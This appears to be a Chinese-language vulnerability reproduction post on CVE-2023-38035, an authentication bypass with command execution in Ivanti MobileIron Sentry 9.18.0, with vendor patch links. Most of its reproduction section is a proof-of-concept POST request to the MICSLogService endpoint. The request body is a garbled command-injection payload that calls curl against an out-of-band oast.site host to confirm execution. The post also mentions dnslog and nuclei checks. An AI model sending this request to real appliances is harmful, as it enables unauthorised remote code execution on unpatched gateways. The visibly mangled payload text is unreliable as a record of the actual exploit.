0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

MobileIron Sentry是美国思可信(MobileIron)公司的一款智能网关产品。

MobileIron Sentry 9.18.0及之前版本存在安全漏洞,该漏洞源于Apache HTTPD 配置限制不足,允许攻击者绕过管理界面上的身份验证控制。

0x02影响版本

Ivanti MobileIron Sentry 9.18.0

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

漏洞复现

POST /mics/services/MICSLogService HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 133
Content-Type: application/json
Accept-Encoding: gzip, deflate

cmup I oadF i I eUs i ngF i I e I nputMScomandSLcur I cm57fqtb I q623 i 3scoc0p47dbxryj81 j7. oast. s i te/?5RPZJeYFD2a4MdFK6Fxzg2sL7JS i sRootTzNz

测试dnslog

漏洞存在

3.nuclei工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface?language=en_US
https://packetstormsecurity.com/files/174643/Ivanti-Sentry-Authentication-Bypass-Remote-Code-Execution.html